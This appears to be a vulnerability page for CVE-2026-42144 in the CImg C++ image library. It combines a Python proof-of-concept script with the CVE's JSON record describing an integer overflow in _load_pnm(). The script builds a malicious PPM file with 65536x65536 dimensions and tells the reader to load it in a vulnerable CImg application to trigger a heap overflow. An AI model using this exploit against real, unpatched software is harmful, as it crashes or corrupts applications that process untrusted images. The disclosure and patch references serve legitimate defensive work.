CVE-2026-42144

#!/usr/bin/env python3 # CVE-2026-42144 PoC Generator for CImg Integer Overflow # This script generates a malicious PPM (P6) file designed to trigger # an integer overflow in the _load_pnm() function of CImg. import struct def generate_malicious_pnm(filename): """ Generates a PPM file with dimensions that cause W*H*D to overflow. Target: CImg Library < commit 4ca26bc """ # PPM P6 format header: "P6 <width> <height> 255\n" # We use dimensions that multiply to a value > 2^31 - 1 (Max Signed Int) # causing a wrap-around to a small positive integer. width = 0x10000 # 65536 height = 0x10000 # 65536 # Calculation: 65536 * 65536 = 4294967296 (2^32) # If stored in a signed 32-bit int, this overflows. # Depending on implementation details, this may result in 0 or a small number. # CImg allocates based on this small number, but reads based on the huge dimensions. header = f"P6 {width} {height} 255\n" # Write some dummy pixel data (R, G, B) # The file doesn't need to be 4GB in size to trigger the crash during allocation/read logic mismatch, # but providing some data ensures the parser attempts to read. data = b"\x00\x00\x00" * 100 with open(filename, "wb") as f: f.write(header.encode('ascii')) f.write(data) print(f"[+] Malicious PNM file generated: {filename}") print(f"[+] Dimensions: {width}x{height}") print(f"[!] Load this file in a vulnerable CImg application to trigger the heap overflow.") if __name__ == "__main__": generate_malicious_pnm("cve-2026-42144-exploit.ppm")

{"cve": {"id": "CVE-2026-42144", "sourceIdentifier": "[email protected]", "published": "2026-05-04T18:16:31.830", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CImg Library is a C++ library for image processing. Prior to commit 4ca26bc, there is an integer overflow vulnerability in the W*H*D size computation inside _load_pnm() that can bypass the memory allocation guard. A crafted PNM/PGM/PPM file with large dimension values causes the overflow to wrap around, allocating an undersized buffer and potentially triggering a heap buffer overflow. Any application using CImg to load untrusted image files is affected. This issue has been patched via commit 4ca26bc."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/GreycLab/CImg/commit/4ca26bce4d8c61fcd1507d5f9401b9fb1222c27d", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/issues/478", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/releases/tag/v.3.7.5", "source": "[email protected]"}, {"url": "https://github.com/GreycLab/CImg/security/advisories/GHSA-4663-63fm-44gc", "source": "[email protected]"}]}}